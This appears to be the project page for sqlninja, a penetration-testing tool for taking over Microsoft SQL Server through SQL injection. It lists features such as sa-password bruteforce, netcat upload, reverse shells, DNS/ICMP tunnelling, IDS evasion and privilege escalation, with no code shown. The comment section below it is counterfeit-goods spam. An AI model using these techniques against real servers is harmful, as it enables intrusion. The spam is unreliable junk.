Introduction
Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access on the DB? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
Have a look at the flash demo and then feel free to download. It is released under the GPLv3
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
Have a look at the flash demo and then feel free to download. It is released under the GPLv3
Features
The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does:
- Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
- Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
- Privilege escalation to sysadmin group if 'sa' password has been found
- Creation of a custom xp_cmdshell if the original one has been removed
- Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
- TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
- Direct and reverse bindshell, both TCP and UDP
- ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
- DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
- Evasion techniques to confuse a few IDS/IPS/WAF
- Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
- Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
- Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM
Platforms supported
Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
- Linux
- FreeBSD
- Mac OS X
Sqlninja does not run on Windows and I am not planning a port in the near future
ugg outlet uk
ReplyDeleteugg outlet online
ugg boots sale
ugg boots
discount ugg boots
cheap ugg boots
michael kors factory store
canada goose coats
canada goose outlet
canada goose outlet
canada goose jackets
chanel handbags outlet
lululemon pants
phone cases
north face jackets
cheap jordan shoes
air jordan shoes for sale
marc jacobs
ferragamo outlet
ninest123 16.03
ReplyDeletechristian louboutin, tory burch outlet, ray ban sunglasses, nike outlet, ralph lauren outlet, louboutin shoes, louis vuitton handbags, replica watches, louis vuitton, louis vuitton outlet, ralph lauren polo, replica watches, michael kors outlet, christian louboutin, longchamp bags, nike air max, cheap oakley sunglasses, oakley sunglasses, uggs outlet, oakley sunglasses, cheap jordans, michael kors outlet online, tiffany jewelry, burberry outlet, prada outlet, louis vuitton outlet, longchamp outlet, uggs on sale, prada handbags, louis vuitton outlet online, michael kors handbags, uggs on sale, uggs outlet, tiffany jewelry, louboutin uk, michael kors outlet online, michael kors outlet online, oakley sunglasses, michael kors, longchamp outlet, nike air max, gucci handbags, ray ban sunglasses, uggs on sale, oakley sunglasses, burberry factory outlet, ray ban sunglasses, nike free
links of london uk, ugg,ugg australia,ugg italia, karen millen uk, louis vuitton, hollister, coach outlet, moncler, sac louis vuitton, montre pas cher, gucci, canada goose outlet, barbour, pandora jewelry, louis vuitton, sac louis vuitton, canada goose pas cher, toms shoes, ugg uk, moncler uk, supra shoes, wedding dresses uk, barbour jackets uk, pandora jewelry, moncler, bottes ugg pas cher, canada goose, canada goose jackets, juicy couture outlet, pandora uk, juicy couture outlet, canada goose uk, marc jacobs, canada goose jackets, louis vuitton uk, moncler outlet, pandora charms, swarovski uk, replica watches, lancel, canada goose outlet, moncler pas cher, moncler, thomas sabo uk, swarovski jewelry, moncler, ugg pas cher, canada goose, converse shoes outlet, moncler jackets, ugg,uggs,uggs canada, ray ban
ReplyDeleteninest123 16.03
ReplyDeleteشركة تنظيف خزانات بالمدينة المنورة
تعمل على تطهير الخزانات وتنظيفها باقوى المطهرات التى تعمل على التنظيف القوى و ازالة الى ميكروبات بالخزانات العلوية و الارضية لتجعلك دائما تحل على مياه صالحه للشرب و الاستخدام المنزلي